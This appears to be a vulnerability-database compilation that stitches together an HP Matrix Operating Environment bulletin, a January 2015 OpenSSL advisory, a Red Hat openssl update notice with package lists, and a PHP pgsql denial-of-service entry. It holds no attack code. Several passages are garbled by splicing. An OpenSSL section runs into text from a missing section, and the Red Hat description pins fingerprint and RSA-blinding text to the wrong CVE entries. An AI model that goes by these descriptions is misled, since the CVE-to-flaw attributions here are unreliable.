CVE-2015-1790 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-1791 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2015-1792 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-2134 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0
CVE-2015-2139 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5
CVE-2015-2140 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9
CVE-2015-2301 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-2331 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-2348 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2015-2787 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-3113 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2015-5122 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2015-5123 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2015-5402 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9
CVE-2015-5403 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5
CVE-2015-5404 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2015-5405 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0
CVE-2015-5427 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2015-5428 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2015-5429 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2015-5430 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2015-5431 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9
CVE-2015-5432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2015-5433 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following software updates available to resolve the
vulnerabilities in the impacted versions of HP Matrix Operating Environment
HP Matrix Operating Environment 7.5.0 is only available on DVD. Please order
the latest version of the HP Matrix Operating Environment 7.5.0 DVD #2 ISO
from the following location:
http://www.hp.com/go/insightupdates
Choose the orange Select button. This presents the HP Insight Management
Media order page. Choose Insight Management 7.5 DVD-2-ZIP August 2015 from
the Software specification list. Fill out the rest of the form and submit it.
HP has addressed these vulnerabilities for the affected software components
bundled with the HP Matrix Operating Environment in the following HP Security
Bulletins.
HP Matrix Operating Environment component
HP Security Bulletin Number
Security Bulletin Location
HP Systems Insight Manager (SIM)
HPSBMU03394
HPSBMU03394
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04762744
HP System Management Homepage (SMH)
HPSBMU03380
http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04746490&la
ng=en-us&cc=
HP Version Control Agent (VCA)
HPSBMU03397
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04765169
HP Version Control Repository Manager (VCRM)
HPSBMU03396
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr
_na-c04765115
HP Virtual Connect Enterprise Manager (VCEM) SDK
HPSBMU03413
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr
_na-c04774021
HISTORY
Version:1 (rev.1) - 24 August 2015 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
References:
CVE-2014-0118 - Remote Denial of Service (DoS)
CVE-2014-0226 - Remote Denial of Service (DoS)
CVE-2014-0231 - Remote Denial of Service (DoS)
CVE-2014-3523 - Remote Denial of Service (DoS)
CVE-2014-3569 - Remote Denial of Service (DoS)
CVE-2014-3570 - Remote Disclosure of Information
CVE-2014-3571 - Remote Denial of Service (DoS)
CVE-2014-3572 - Remote Disclosure of Information
CVE-2014-8142 - Remote Code Execution
CVE-2014-8275 - Unauthorized Modification
CVE-2014-9427 - Remote Disclosure of Information
CVE-2014-9652 - Remote Denial of Service (DoS)
CVE-2014-9653 - Remote Denial of Service (DoS)
CVE-2014-9705 - Remote Code Execution
CVE-2015-0204 - Remote Disclosure of Information
CVE-2015-0205 - Remote Unauthorized Access
CVE-2015-0206 - Remote Denial of Service (DoS)
CVE-2015-0207 - Remote Denial of Service (DoS)
CVE-2015-0208 - Remote Denial of Service (DoS)
CVE-2015-0209 - Remote Denial of Service (DoS)
CVE-2015-0231 - Remote Denial of Service (DoS)
CVE-2015-0232 - Remote Denial of Service (DoS), Execution of Arbitrary Code
CVE-2015-0273 - Remote Execution of Arbitrary Code
CVE-2015-0285 - Remote Disclosure of Information
CVE-2015-0286 - Remote Denial of Service (DoS)
CVE-2015-0287 - Remote Denial of Service (DoS)
CVE-2015-0288 - Remote Denial of Service (DoS)
CVE-2015-0289 - Remote Denial of Service (DoS)
CVE-2015-0290 - Remote Denial of Service (DoS)
CVE-2015-0291 - Remote Denial of Service (DoS)
CVE-2015-0292 - Remote Denial of Service (DoS)
CVE-2015-0293 - Remote Denial of Service (DoS)
CVE-2015-1787 - Remote Denial of Service (DoS)
CVE-2015-2301 - Remote Execution of Arbitrary Code
CVE-2015-2331 - Remote Denial of Service (DoS), Execution of Arbitrary Code
CVE-2015-2348 - Unauthorized Modification
CVE-2015-2787 - Remote Execution of Arbitrary Code
CVE-2015-2134 - Cross-site Request Forgery (CSRF)
SSRT102109
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. OpenSSL Security Advisory [08 Jan 2015]
=======================================
DTLS segmentation fault in dtls1_get_record (CVE-2014-3571)
===========================================================
Severity: Moderate
A carefully crafted DTLS message can cause a segmentation fault in OpenSSL due
to a NULL pointer dereference.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1k.
OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0p.
OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 22nd October 2014 by Markus Stenberg of
Cisco Systems, Inc. The fix was developed by Stephen Henson of the OpenSSL
core team.
DTLS memory leak in dtls1_buffer_record (CVE-2015-0206)
=======================================================
Severity: Moderate
A memory leak can occur in the dtls1_buffer_record function under certain
conditions. In particular this could occur if an attacker sent repeated DTLS
records with the same sequence number but for the next epoch. The memory leak
could be exploited by an attacker in a Denial of Service attack through memory
exhaustion.
This issue affects OpenSSL versions: 1.0.1 and 1.0.0.
OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1k.
OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0p.
This issue was reported to OpenSSL on 7th January 2015 by Chris Mueller who also
provided an initial patch. Further analysis was performed by Matt Caswell of the
OpenSSL development team, who also developed the final patch.
no-ssl3 configuration sets method to NULL (CVE-2014-3569)
=========================================================
Severity: Low
When openssl is built with the no-ssl3 option and a SSL v3 ClientHello is
received the ssl method would be set to NULL which could later result in
a NULL pointer dereference.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 17th October 2014 by Frank Schmirler. The
fix was developed by Kurt Roeckx.
ECDHE silently downgrades to ECDH [Client] (CVE-2014-3572)
==========================================================
Severity: Low
An OpenSSL client will accept a handshake using an ephemeral ECDH ciphersuite
using an ECDSA certificate if the server key exchange message is omitted. This
effectively removes forward secrecy from the ciphersuite.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan
Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen
Henson of the OpenSSL core team.
RSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204)
==============================================================
Severity: Low
An OpenSSL client will accept the use of an RSA temporary key in a non-export
RSA key exchange ciphersuite. A server could present a weak temporary key
and downgrade the security of the session.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan
Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen
Henson of the OpenSSL core team. This effectively allows a client
to authenticate without the use of a private key. This only affects servers
which trust a client certificate authority which issues certificates
containing DH keys: these are extremely rare and hardly ever encountered.
This issue affects OpenSSL versions: 1.0.1 and 1.0.0.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan
Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen
Henson of the OpenSSL core team.
Certificate fingerprints can be modified (CVE-2014-8275)
========================================================
Severity: Low
OpenSSL accepts several non-DER-variations of certificate signature
algorithm and signature encodings. OpenSSL also does not enforce a
match between the signature algorithm between the signed and unsigned
portions of the certificate. By modifying the contents of the
signature algorithm or the encoding of the signature, it is possible
to change the certificate's fingerprint.
This does not allow an attacker to forge certificates, and does not
affect certificate verification or OpenSSL servers/clients in any
other way. It also does not affect common revocation mechanisms. Only
custom applications that rely on the uniqueness of the fingerprint
(e.g. certificate blacklists) may be affected.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and
0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
One variant of this issue was discovered by Antti Karjalainen and
Tuomo Untinen from the Codenomicon CROSS program and reported to
OpenSSL on 1st December 2014 by NCSC-FI Vulnerability
Co-ordination. Another variant was independently reported to OpenSSL
on 12th December 2014 by Konrad Kraszewski from Google. Further
analysis was conducted and fixes were developed by Stephen Henson of
the OpenSSL core team.
Bignum squaring may produce incorrect results (CVE-2014-3570)
=============================================================
Severity: Low
Bignum squaring (BN_sqr) may produce incorrect results on some
platforms, including x86_64. This bug occurs at random with a very
low probability, and is not known to be exploitable in any way, though
its exact impact is difficult to determine. The following has been
determined:
*) The probability of BN_sqr producing an incorrect result at random
is very low: 1/2^64 on the single affected 32-bit platform (MIPS) and
1/2^128 on affected 64-bit platforms.
*) On most platforms, RSA follows a different code path and RSA
operations are not affected at all. For the remaining platforms
(e.g. OpenSSL built without assembly support), pre-existing
countermeasures thwart bug attacks [1].
*) Static ECDH is theoretically affected: it is possible to construct
elliptic curve points that would falsely appear to be on the given
curve. However, there is no known computationally feasible way to
construct such points with low order, and so the security of static
ECDH private keys is believed to be unaffected.
*) Other routines known to be theoretically affected are modular
exponentiation, primality testing, DSA, RSA blinding, JPAKE and
SRP. No exploits are known and straightforward bug attacks fail -
either the attacker cannot control when the bug triggers, or no
private key material is involved.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 2nd November 2014 by Pieter Wuille
(Blockstream) who also suggested an initial fix. Further analysis was
conducted by the OpenSSL development team and Adam Langley of
Google. The final fix was developed by Andy Polyakov of the OpenSSL
core team.
[1] http://css.csail.mit.edu/6.858/2013/readings/rsa-bug-attacks.pdf
Note
====
As per our previous announcements and our Release Strategy
(https://www.openssl.org/about/releasestrat.html), support for OpenSSL versions
1.0.0 and 0.9.8 will cease on 31st December 2015. No security updates for these
releases will be provided after that date. Users of these releases are advised
to upgrade.
References
==========
URL for this Security Advisory:
https://www.openssl.org/news/secadv_20150108.txt
Note: the online version of the advisory may be updated with additional
details over time.
For details of OpenSSL severity classifications please see:
https://www.openssl.org/about/secpolicy.html
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: openssl security update
Advisory ID: RHSA-2015:0066-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0066.html
Issue date: 2015-01-20
Updated on: 2015-01-21
CVE Names: CVE-2014-3570 CVE-2014-3571 CVE-2014-3572
CVE-2014-8275 CVE-2015-0204 CVE-2015-0205
CVE-2015-0206
=====================================================================
1. Summary:
Updated openssl packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 6 and 7.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
3. Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),
Transport Layer Security (TLS), and Datagram Transport Layer Security
(DTLS) protocols, as well as a full-strength, general purpose cryptography
library.
A NULL pointer dereference flaw was found in the DTLS implementation of
OpenSSL. A remote attacker could send a specially crafted DTLS message,
which would cause an OpenSSL server to crash. A remote attacker could send
multiple specially crafted DTLS messages to exhaust all available memory of
a DTLS server. This flaw could
possibly affect certain OpenSSL library functionality, such as RSA
blinding. (CVE-2014-3570)
It was discovered that OpenSSL would perform an ECDH key exchange with a
non-ephemeral key even when the ephemeral ECDH cipher suite was selected.
An attacker could use these flaws to modify an X.509 certificate to produce
a certificate with a different fingerprint without invalidating its
signature, and possibly bypass fingerprint-based blacklisting in
applications. (CVE-2015-0205)
All OpenSSL users are advised to upgrade to these updated packages, which
contain a backported patch to mitigate the above issues. For the update to
take effect, all services linked to the OpenSSL library (such as httpd and
other SSL-enabled services) must be restarted or the system rebooted.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1180184 - CVE-2015-0204 openssl: Only allow ephemeral RSA keys in export ciphersuites
1180185 - CVE-2014-3572 openssl: ECDH downgrade bug fix
1180187 - CVE-2014-8275 openssl: Fix various certificate fingerprint issues
1180234 - CVE-2014-3571 openssl: DTLS segmentation fault in dtls1_get_record
1180235 - CVE-2015-0206 openssl: DTLS memory leak in dtls1_buffer_record
1180239 - CVE-2015-0205 openssl: DH client certificates accepted without verification
1180240 - CVE-2014-3570 openssl: Bignum squaring may produce incorrect results
6. Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
i386:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-perl-1.0.1e-30.el6_6.5.i686.rpm
openssl-static-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
i386:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
ppc64:
openssl-1.0.1e-30.el6_6.5.ppc.rpm
openssl-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.ppc.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-devel-1.0.1e-30.el6_6.5.ppc.rpm
openssl-devel-1.0.1e-30.el6_6.5.ppc64.rpm
s390x:
openssl-1.0.1e-30.el6_6.5.s390.rpm
openssl-1.0.1e-30.el6_6.5.s390x.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.s390.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm
openssl-devel-1.0.1e-30.el6_6.5.s390.rpm
openssl-devel-1.0.1e-30.el6_6.5.s390x.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-perl-1.0.1e-30.el6_6.5.i686.rpm
openssl-static-1.0.1e-30.el6_6.5.i686.rpm
ppc64:
openssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-perl-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-static-1.0.1e-30.el6_6.5.ppc64.rpm
s390x:
openssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm
openssl-perl-1.0.1e-30.el6_6.5.s390x.rpm
openssl-static-1.0.1e-30.el6_6.5.s390x.rpm
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
i386:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-perl-1.0.1e-30.el6_6.5.i686.rpm
openssl-static-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
ppc64:
openssl-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-devel-1.0.1e-34.el7_0.7.ppc.rpm
openssl-devel-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-libs-1.0.1e-34.el7_0.7.ppc.rpm
openssl-libs-1.0.1e-34.el7_0.7.ppc64.rpm
s390x:
openssl-1.0.1e-34.el7_0.7.s390x.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm
openssl-devel-1.0.1e-34.el7_0.7.s390.rpm
openssl-devel-1.0.1e-34.el7_0.7.s390x.rpm
openssl-libs-1.0.1e-34.el7_0.7.s390.rpm
openssl-libs-1.0.1e-34.el7_0.7.s390x.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64:
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-perl-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-static-1.0.1e-34.el7_0.7.ppc.rpm
openssl-static-1.0.1e-34.el7_0.7.ppc64.rpm
s390x:
openssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm
openssl-perl-1.0.1e-34.el7_0.7.s390x.rpm
openssl-static-1.0.1e-34.el7_0.7.s390.rpm
openssl-static-1.0.1e-34.el7_0.7.s390x.rpm
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2014-3570
https://access.redhat.com/security/cve/CVE-2014-3571
https://access.redhat.com/security/cve/CVE-2014-3572
https://access.redhat.com/security/cve/CVE-2014-8275
https://access.redhat.com/security/cve/CVE-2015-0204
https://access.redhat.com/security/cve/CVE-2015-0205
https://access.redhat.com/security/cve/CVE-2015-0206
https://access.redhat.com/security/updates/classification/#moderate
https://www.openssl.org/news/secadv_20150108.txt
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFUwCWMXlSAg2UNWIIRAioBAJ4/RjG4OGXzCwg+PJJWNqyvahe3rQCeNE+X
ENFobdxQdJ+gVAiRe8Qf54A=
=wyAg
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201503-0389 | CVE-2015-1352 | PHP PostgreSQL Extended denial of service vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The build_tablename function in pgsql.c in the PostgreSQL (aka pgsql) extension in PHP through 5.6.7 does not validate token extraction for table names, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted name. PHP is prone to a denial-of-service vulnerability due to a Null-pointer deference condition.
